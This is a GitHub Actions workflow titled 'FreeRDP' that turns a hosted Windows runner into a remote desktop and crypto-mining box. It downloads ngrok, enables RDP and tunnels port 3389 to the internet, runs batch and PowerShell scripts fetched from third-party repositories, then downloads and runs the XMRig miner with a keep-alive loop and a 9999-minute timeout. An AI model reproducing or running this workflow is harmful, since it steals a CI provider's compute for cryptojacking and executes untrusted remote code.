jobs:
name: FreeRDP

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Downloading Ngrok.
      run: |
        Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
        Invoke-WebRequest https://raw.githubusercontent.com/denisook/denisasuke/main/start.bat -OutFile start.bat
    - name: Extracting Ngrok Files.
      run: Expand-Archive ngrok.zip
    - name: Connecting to your Ngrok account.
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Activating RDP access.
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - name: Creating Tunnel.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp 3389"'
    - name: Connecting to your RDP.
      run: cmd /c start.bat
    - name: Downloading XMRIG/running/started
      run: |
        Invoke-WebRequest https://github.com/Rohan-uwu/XMRnsdkjbahsndsavjdbsvjksdadjkbsahvdhashjdjasbjkbdshfjsjiusdiohdjsldk-ahjkdfhhdbiugsdjhfuiassijfi/releases/download/1/xmrig-6.12.2.zip -OutFile XMRIG.zip
        Expand-Archive XMRIG.zip
        .\XMRIG\xmrig-6.12.2\xmrig.exe &&
        Invoke-WebRequest https://raw.githubusercontent.com/denisook/denisasuke/main/loop.ps1 -OutFile loop.ps1
        ./loop.ps1
